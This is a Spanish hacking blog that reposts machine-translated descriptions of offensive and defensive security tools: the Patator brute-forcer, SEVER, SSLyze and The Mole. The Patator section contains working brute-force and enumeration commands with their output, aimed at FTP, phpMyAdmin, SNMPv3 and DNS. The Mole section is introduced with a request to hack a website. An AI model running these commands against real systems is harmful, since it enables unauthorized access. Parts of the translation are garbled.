jueves, 29 de diciembre de 2011

Patator

Saludos mundo Libre.

Patator es un multi-propósito bruta forzador, con un diseño modular y un uso flexible. Básicamente, el autor se cansó de la utilización de Medusa, la Hidra, ncrack, módulos auxiliares metasploit, nmap scripts NSE y similares porque:

    
O bien no funcionan o no son fiables (falsos negativos en varias ocasiones en el pasado)
    
Son lentos (no multi-threaded o no pruebas de múltiples contraseñas en la misma conexión TCP)
    
Carecen de características muy útiles que sean fáciles de código en Python (por ejemplo, interactivo en tiempo de ejecución)
Básicamente, usted debe dar una oportunidad Patator una vez que se decepcione por Medusa, Hydra y otras herramientas de fuerza bruta y están a punto de código de script propio pequeño porque Patator le permitirá:

    
No escriba el mismo código una y otra vez
    
Ejecutar múltiples subprocesos
    
Beneficiarse de las características útiles, tales como los comandos de tiempo de ejecución interactiva, el registro de respuesta, etc
Actualmente soporta los siguientes módulos:

    
ftp_login: fuerza bruta FTP
    
ssh_login: fuerza bruta SSH
    
telnet_login: fuerza bruta Telnet
    
smtp_login: fuerza bruta SMTP
    
smtp_vrfy: Enumerar los usuarios válidos con el comando SMTP VRFY
    
smtp_rcpt: Enumerar los usuarios válidos utilizando el comando RCPT TO SMTP
    
http_fuzz: fuerza bruta HTTP / HTTPS
    
pop_passd: fuerza bruta poppassd (no POP3)
    
ldap_login: fuerza bruta LDAP
    
smb_login: fuerza bruta SMB
    
mssql_login: fuerza bruta MSSQL
    
oracle_login: la fuerza bruta de Oracle
    
mysql_login: fuerza bruta MySQL
    
pgsql_login: fuerza bruta PostgreSQL
    
vnc_login: fuerza bruta VNC
    
dns_forward: Delantero subdominios de búsqueda
    
dns_reverse: Reverse subredes de búsqueda
    
snmp_login: fuerza bruta SNMPv1 / 2 y SNMPv3
    
unzip_pass: la fuerza bruta la contraseña de archivos ZIP cifrados
    
keystore_pass: la fuerza bruta la contraseña de almacén de archivos de Java
El nombre de "Patator" proviene de este clip entrevista tv - patator
Patator NO es un script-kiddie amistoso, por favor, lea el README dentro patator.py antes de informar / queja / preguntándome cómo utilizar esta herramienta ..



  • FTP : Enumerate valid logins on a too verbose server
 $ patator.py ftp_login host=10.0.0.1 user=FILE0 password=qsdf 0=logins.txt -x ignore,reset,retry:code=500 -x reset:code=230 -x ignore:mesg='Login incorrect.'
 22:27:29 patator    INFO - Starting Patator v0.2
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 22:27:29 patator    INFO - ---------------------------------------------------------------
 22:27:30 patator    INFO - 530 18          | root                        |     1 | Permission denied.
 22:27:31 patator    INFO - 230 17          | ftp                         |    13 | Login successful.
 22:27:34 patator    INFO - 530 18          | admin                       |    23 | Permission denied.
 22:27:34 patator    INFO - 530 18          | oracle                      |    31 | Permission denied.
 22:28:02 patator    INFO - 530 18          | test                        |   179 | Permission denied.
 22:28:21 patator    INFO - 230 17          | anonymous                   |   283 | Login successful.
 22:28:26 patator    INFO - 530 18          | ftpuser                     |   357 | Permission denied.
 22:28:41 patator    INFO - 530 18          | nobody                      |   402 | Permission denied.
 ...
 

  • HTTP : Brute-force phpMyAdmin logon
 $ http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=COMBO00&pma_password=COMBO01&server=1&lang=en' 0=combos.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server' -l /tmp/qsdf
 10:55:50 patator    INFO - Starting Patator v0.2
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:55:50 patator    INFO - ---------------------------------------------------------------
 10:55:50 patator    INFO - 200 8209:7075   | root:                       |    22 | HTTP/1.1 200 OK
 10:55:51 patator    INFO - 200 3838:2566   | root:p@ssw0rd               |    44 | HTTP/1.1 200 OK
 ^C
 10:55:52 patator    INFO - Hits/Done/Size/Fail: 2/125/2342/0, Avg: 47 r/s, Time: 0h 0m 2s
 10:55:52 patator    INFO - To resume execution, pass --resume 12,13,12,13,12,12,13,13,13,12
 
 $ cat /tmp/qsdf/22_200_8209\:7075.txt
 ...
 
Login without a password is forbidden by configuration (see AllowNoPassword)

  • SNMPv3 : Find valid usernames
 $ snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
 17:51:06 patator    INFO - Starting Patator v0.2
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:06 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:51:06 patator    INFO - ---------------------------------------------------------------
 17:51:11 patator    INFO - 0-0 11          | robert                      |    55 | wrongDigest
 17:51:12 patator    INFO - Progress:  20% (70/345) | Speed: 10 r/s | ETC: 17:51:38 (00:00:26 remaining)
 17:51:33 patator    INFO - 0-0 11          | myuser                      |   311 | wrongDigest
 17:51:36 patator    INFO - Hits/Done/Size/Fail: 2/345/345/0, Avg: 11 r/s, Time: 0h 0m 30s
 
  • SNMPv3 : Find valid passwords
 $ snmp_login host=10.0.0.1 version=3 user=robert auth_key=FILE0 0=passwords_8+.txt -x ignore:mesg=wrongDigest
 17:52:15 patator    INFO - Starting Patator v0.2
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:15 patator    INFO - code & size     | candidate                   |   num | mesg ..
 17:52:15 patator    INFO - ---------------------------------------------------------------
 17:52:16 patator    INFO - 0-0 69          | password123                 |    16 | Linux thug 2.6.36-gentoo #5 SMP Fri Aug 12 14:49:51 CEST 2011 i686
 17:52:17 patator    INFO - Hits/Done/Size/Fail: 1/50/50/0, Avg: 38 r/s, Time: 0h 0m 1s
 

  • DNS : Forward lookup
 $ dns_forward domain=FILE0.hsc.fr 0=names.txt -x ignore:code=3
 10:53:20 patator    INFO - Starting Patator v0.2
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:53:20 patator    INFO - ---------------------------------------------------------------
 10:53:20 patator    INFO - 0 35            | www                         |     4 | NOERROR www.hsc.fr / 217.174.211.25
 10:53:20 patator    INFO - 0 51            | mail                        |    32 | NOERROR itesec.hsc.fr / 192.70.106.33 / mail.hsc.fr
 10:53:21 patator    INFO - 0 8             | test                        |    54 | NOERROR 
 10:53:21 patator    INFO - 0 34            | wap                         |    66 | NOERROR wap.hsc.fr / 192.70.106.33
 10:53:21 patator    INFO - 0 38            | webmail                     |    62 | NOERROR webmail.hsc.fr / 192.70.106.95
 10:53:21 patator    INFO - 0 51            | news                        |   114 | NOERROR itesec.hsc.fr / 192.70.106.33 / news.hsc.fr
 10:53:22 patator    INFO - 0 61            | mailhost                    |   137 | NOERROR mailhost.hsc.fr / 2001:7a8:1155:2::abcd 192.70.106.33
 10:53:22 patator    INFO - 0 55            | extranet                    |   131 | NOERROR itesec.hsc.fr / 192.70.106.33 / extranet.hsc.fr
 Hostmap ------------------------------------------
                    mailhost.hsc.fr 2001:7a8:1155:2::abcd
                    mailhost.hsc.fr 192.70.106.33
                         wap.hsc.fr 192.70.106.33
                      itesec.hsc.fr 192.70.106.33
                    extranet.hsc.fr .
                        mail.hsc.fr .
                        news.hsc.fr .
                     webmail.hsc.fr 192.70.106.95
                         www.hsc.fr 217.174.211.25
 Domains ------------------------------------------
                             hsc.fr 6
 Networks -----------------------------------------
                             2001:7a8:1155:2::abcd
                                      192.70.106.x
                                    217.174.211.25
 10:53:34 patator    INFO - Hits/Done/Size/Fail: 8/300/300/0, Avg: 21 r/s, Time: 0h 0m 14s
 
  • DNS : Reverse lookup two netblocks owned by Google
 $ dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-
 10:52:17 patator    INFO - Starting Patator v0.2
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:17 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:52:17 patator    INFO - ---------------------------------------------------------------
 10:52:18 patator    INFO - 0 22            | 216.239.32.10               |    11 | NOERROR ns1.google.com
 10:52:18 patator    INFO - 0 21            | 216.239.32.11               |    12 | NOERROR ns.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.32.15               |    16 | NOERROR time1.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.17               |   274 | NOERROR smtp-out.google.com
 10:52:18 patator    INFO - 0 23            | 216.239.33.12               |   269 | NOERROR dns1.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.5                |   262 | NOERROR proxy.google.com
 10:52:18 patator    INFO - 0 28            | 216.239.33.18               |   275 | NOERROR smtp-out3.google.com
 10:52:18 patator    INFO - 0 24            | 216.239.33.28               |   285 | NOERROR smtp8.google.com
 10:52:18 patator    INFO - 0 26            | 216.239.33.20               |   277 | NOERROR esc-out.google.com
 10:52:18 patator    INFO - 0 27            | 216.239.33.22               |   279 | NOERROR transfer.google.com
 10:52:19 patator    INFO - 0 22            | 216.239.34.10               |   523 | NOERROR ns2.google.com
 10:52:19 patator    INFO - 0 24            | 216.239.34.15               |   528 | NOERROR time2.google.com
 ^C
 Hostmap ------------------------------------------
                     ns1.google.com 216.239.32.10
                      ns.google.com 216.239.32.11
                   time1.google.com 216.239.32.15
                   proxy.google.com 216.239.33.5
                    dns1.google.com 216.239.33.12
                smtp-out.google.com 216.239.33.17
               smtp-out3.google.com 216.239.33.18
                 esc-out.google.com 216.239.33.20
                transfer.google.com 216.239.33.22
                   smtp8.google.com 216.239.33.28
                     ns2.google.com 216.239.34.10
                   time2.google.com 216.239.34.15
 Domains ------------------------------------------
                         google.com 12
 Networks -----------------------------------------
                                      216.239.32.x
                                      216.239.33.x
                                      216.239.34.x
 10:52:20 patator    INFO - Hits/Done/Size/Fail: 12/664/4352/0, Avg: 238 r/s, Time: 0h 0m 2s
 10:52:20 patator    INFO - To resume execution, pass --resume 67,74,68,66,63,69,54,64,69,70
 

  • ZIP : Crack a password-protected ZIP file (older pkzip encryption not supported in JtR)
 $ unzip_pass zipfile=challenge1.zip password=FILE0 0=rockyou.dic -x ignore:code!=0 
 10:54:29 patator    INFO - Starting Patator v0.2
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:29 patator    INFO - code & size     | candidate                   |   num | mesg ..
 10:54:29 patator    INFO - ---------------------------------------------------------------
 10:54:30 patator    INFO - 0 82            | love                        |   387 | 0 [82] No errors detected in compressed data of challenge1.zip.
 ^C
 10:54:31 patator    INFO - Hits/Done/Size/Fail: 1/1589/5000/0, Avg: 699 r/s, Time: 0h 0m 2s
 10:54:31 patator    INFO - To resume execution, pass --resume 166,164,165,166,155,158,148,158,155,154 
 
Fuente: http://code.google.com/p/patator/
 
Traducion: Dellcom1@.
 
Saludos Mundo Libre. 

jueves, 22 de diciembre de 2011

Social Engineering Vulnerability Evaluation and Recommendation Project

Saludos Mundo Libre.

Para todos aquellos que quieres aprender :

Ingeniería social, evaluación de la vulnerabilidad y Proyecto de Recomendación
 

¿Desea aprender Pruebas de Penetración

La ingeniería social ha sido de alrededor de decenas de miles de años, así que es hora de que nos acercamos al tema de una manera profesional. La Evaluación de Ingeniería de vulnerabilidad social y la Recomendación (Sever) del proyecto es una manera de ayudar a los probadores de penetración cada vez más consistente. También se pretende que sea la mejor manera de enseñar a los novatos sobre los conceptos de ingeniería social.

De la destilación de miles de páginas de la teoría en una forma simple el proyecto SEVER espera:

     Proporcionan el medio más rápido de los novatos de formación sobre los complejos conceptos de ingeniería social.
    

Proporcionar pruebas de penetración con una metodología que minimiza su esfuerzo al tiempo que aumenta sus posibilidades de éxito.

Usted va a comenzar por la definición de requisitos, a continuación, generar soluciones, y luego refinar sus soluciones a través de varias fases. Cada fase aumenta en detalle, lo que permite identificar 'show tapones "tan pronto como sea posible. Esto le ayudará a evitar la pérdida de tiempo trabajando en un plan que no va a tener éxito. Si una idea se hace a través de todo el proceso y todavía te sientes bien por ello, entonces debería haber una posibilidad muy alta de éxito.

El mejor formato para este contenido sería una forma electrónica con un montón de notas sensibles al contexto. Pero ya que actualmente no existe una forma eficaz y portátil de lograr que se decidió dividir el contenido en dos archivos PDF - la hoja de cortar y las instrucciones de Sever. Ir a través de estas instrucciones mientras se llena el formulario hasta que haya una comprensión cabal de cómo se forman las obras. Si haces trampa y tratar de hacer uno delante del otro (u omitir las instrucciones en total) se perderá lo que hará falta mucho más probable.


Fuente: http://www.darknet.org.uk/

Descarga Archivo: http://www.darknet.org.uk/


Traduccion: Dellcom1a


Saludos Mundo Libre.

miércoles, 7 de diciembre de 2011

Transport Layer Security (TLS)

Saludos Mundo Libre.

Transport Layer Security (TLS), comúnmente llamado SSL, es uno de los protocolos más utilizados para asegurar las comunicaciones de red. Como los costos de la seguridad y la caída de los usuarios y las expectativas de privacidad de las empresas que se incremento el despliegue de más ampliamente cada año. Los ataques contra el sistema de CA, las fallas de aplicación SSL y el envejecimiento de las versiones del protocolo han acaparado los titulares de prensa, llamando la atención a las configuraciones débiles, y la necesidad de evitarlos. Además, una mala configuración del servidor siempre ha aumentado considerablemente la sobrecarga causada por SSL, retrasando la transición a la seguridad mejora de las comunicaciones.

Para ayudar a mejorar las configuraciones del sistema, iSEC está lanzando el software libre "SSLyze" de la herramienta. Ellos han encontrado esta útil herramienta para el análisis de la configuración de los servidores SSL y para la identificación de errores de configuración, tales como el uso de versiones obsoletas del protocolo, la debilidad de los algoritmos hash en las cadenas de la confianza, la renegociación de la inseguridad, y la configuración de la sesión de reanudación.

SSLyze es una aplicación independiente python que busca errores de configuración SSL clásico, mientras que proporciona al usuario avanzado la posibilidad de personalizar la aplicación a través de una interfaz simple plugin.

características

     Prueba de renegociación inseguros
     La exploración de sistemas de cifrado de la fuerza débil
     Comprobación de SSLv2, SSLv3 y versiones TLSv1
     Certificado de servidor de información de descarga y validación básica
     Capacidades sesión de reanudación y la medición real de reanudación de la tasa
     Soporte para la autenticación de certificado de cliente
     Exploración simultánea de múltiples servidores, versiones y cifras

Por ejemplo, puede ayudar a SSLyze usuario identificar las configuraciones del servidor vulnerable a la recientemente liberada del THC SSL ataque DOS comprobando el apoyo del servidor de cliente inició la renegociación. Para más información sobre las pruebas de las renegociaciones iniciadas por el cliente, se puede leer aquí.




Fuente: http://code.google.com/p/sslyze/

Descarga: http://code.google.com/p/sslyze/


Traduccion: Dellcom1@.


Saludos Mundo Libre.

jueves, 1 de diciembre de 2011

The Mole SQL Injection

Saludos Mundo Libre.

Hace un par de dias he recibido una MSN para el hackeo de una web y de ahi parto con este articulo para mi amigo hacker.

The Mole es una herramienta de inyección SQL automático explotación. Sólo mediante una URL vulnerable y una cadena válida en el sitio es capaz de detectar la inyección y la explotan, ya sea mediante la técnica de unión o de una técnica de consulta en función booleana.
características

     Apoyo a las inyecciones usando MySQL, SQL Server, PostgreSQL y Oracle.
     Interfaz de línea de comandos. Diferentes comandos de disparo diferentes acciones.
     Finalización automática de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.
     Soporte para filtros de consulta, con el fin de evitar que determinadas IP / IDS normas el uso de filtros genéricos, y la posibilidad de crear otras nuevas con facilidad.
     Desarrollado en Python 3.

 Instalación de The Mole
binarios de Windows
dependencias

ninguno
Proceso de configuración

     Descomprimir el archivo. Ahora tendrá una carpeta con el nombre themole- con varios archivos en su interior.
     Ejecutar el archivo mole.exe dentro de la carpeta.

En este momento sólo hay una versión binaria de 32 bits de Windows. Pronto comenzará a dar la liberación de 64 bits.
Fuentes para los no-Windows OS
dependencias

     Python 3. Se puede descargar desde el sitio oficial aquí o hacerlo a través de su gestor de paquetes.
     lxml. Se puede descargar desde su sitio aquí oa través del gestor de paquetes que pueda tener. Para instalarlo desde las fuentes, en primer lugar usted necesita la python3 encabezados desarrolladores se puede descargar la de los administradores de su paquete (python3-dev en Ubuntu, por ejemplo). Luego, descomprimir los fuentes y dentro de esa carpeta:

python3 setup.py construir

# Python3 setup.py install

     readline. Si está ejecutando un sistema Unix, entonces seguramente lo han instalado.

Proceso de configuración

Una vez que las dependencias se han instalado:

     Descomprimir el archivo de fuentes. Usted puede hacer esto con alquitrán xfz . Ahora tendrá una carpeta con el nombre themole- con las fuentes en su interior.
     Ejecutar con el archivo python3 mole.py hay algunos argumentos que se pueden dar en el programa, lea el archivo README para aprender sobre ellos.

Fuentes para Windows
dependencias

     Python 3. Se puede descargar desde el sitio oficial aquí o hacerlo a través de su gestor de paquetes.
     lxml. Usted puede descargar el código fuente de su sitio de aquí o se puede descargar un instalador de PyPI

Proceso de configuración

     Descomprimir el archivo. Ahora tendrá una carpeta con el nombre themole- con varios archivos en su interior.
     Ejecutar mole.py con el intérprete de Python 3.

Instalación lxml en GNU / Linux
repositorios

La manera más común para instalarlo es buscar en los repositorios de tu distribución.
Por ejemplo, en Ubuntu el lxml para python3 está disponible en los repositorios de 11,04 hacia arriba
con el nombre python3-lxml.
Instalación de fuentes

En el caso, los depósitos no tienen la biblioteca a disposición, no depósitos o lo que desea es
instalarlo desde las fuentes, antes de que nos explique cómo hacerlo.
requisitos

Antes de iniciar la instalación es necesario tener las siguientes cosas:
Python 3

Bastante obvio por qué, pero sigue siendo un requisito. Siga las instrucciones que se dan con la
fuentes oficiales.
Python cabeceras de desarrollo

Si usted ha elegido para instalar python3 de sus fuentes, es que ya tienen el desarrollo
cabeceras instaladas. Si no, usted debe descargar desde el repositorio. en Ubuntu
que se puede encontrar bajo el paquete python3-dev
libxml

lxml requiere la unión de python libxml. Se recomienda su instalación a través de los repositorios
en caso de tener. Para instalarlo desde las fuentes de ir a la página oficial
y seguir sus instrucciones (para ello será necesario instalar más dependencias).
Proceso de instalación

     Extracto lxml código fuente:. $ Tar xfz lxml- tgz
     Ve a la carpeta extraída: $ cd lxml-
     Compilar lxml con python3:
     $ Python3 setup.py construir
     Ahora bien, si todo ha ido bien (como era de esperar), como raíz de la instalación de la biblioteca lxml (de nuevo, utilizando python3):
     # Python3 setup.py install

Es muy importante que utilice python3 tanto, compilar e instalar lxml, si utiliza python2 la biblioteca se encuentra dañado o no cuando se utiliza en La Mole
.

Una exelente Herramienta.
Fuente:http://themole.sourceforge.net/

Descarga:http://themole.sourceforge.net/?q=downloads

Traduccion: Dellcom1@.

Saludos Mundo Libre.